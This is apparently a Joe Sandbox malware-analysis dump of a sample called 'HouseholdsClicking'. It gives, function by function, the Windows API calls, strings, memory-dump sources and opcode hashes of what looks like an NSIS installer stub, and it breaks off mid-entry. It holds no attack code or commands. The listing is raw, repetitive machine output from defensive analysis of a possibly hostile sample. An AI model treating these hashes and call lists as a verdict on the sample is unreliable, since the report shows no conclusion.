                                                                                                                                            • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                            APIs
                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                            • String ID: !
                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                            • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                            • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                            • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                            • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                            APIs
                                                                                                                                            • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                            • wsprintfW.USER32 ref: 00404483
                                                                                                                                            • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                            • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                            • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                            • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                            • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                            Strings
                                                                                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                            • API String ID: 1697273262-1764544995
                                                                                                                                            • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                            • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                            • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                            • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                              • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                              • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                            • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                                                                                            • API String ID: 2577523808-3778932970
                                                                                                                                            • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                            • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                            • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                            • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcatwsprintf
                                                                                                                                            • String ID: %02x%c$...
                                                                                                                                            • API String ID: 3065427908-1057055748
                                                                                                                                            • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                            • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                            • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                            • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                            APIs
                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                            • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                            • API String ID: 2266616436-4211696005
                                                                                                                                            • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                            • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                            • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                            • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                            APIs
                                                                                                                                            • GetDC.USER32(?), ref: 00402100
                                                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,74DF23A0,00000000), ref: 00406902
                                                                                                                                            • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1599320355-0
                                                                                                                                            • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                            • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                            • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                            • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                            • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                            • String ID: Version
                                                                                                                                            • API String ID: 512980652-315105994
                                                                                                                                            • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                            • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                            • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                            • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                            APIs
                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                            • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                            • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                            • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                            • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                            APIs
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2883127279-0
                                                                                                                                            • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                            • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                            • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                            • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                            APIs
                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                            • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                            • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                            • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                            • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                            APIs
                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                            • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PrivateProfileStringlstrcmp
                                                                                                                                            • String ID: !N~
                                                                                                                                            • API String ID: 623250636-529124213
                                                                                                                                            • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                            • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                            • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                            • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                            Strings
                                                                                                                                            • Error launching installer, xrefs: 00405C74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                            • String ID: Error launching installer
                                                                                                                                            • API String ID: 3712363035-66219284
                                                                                                                                            • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                            • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
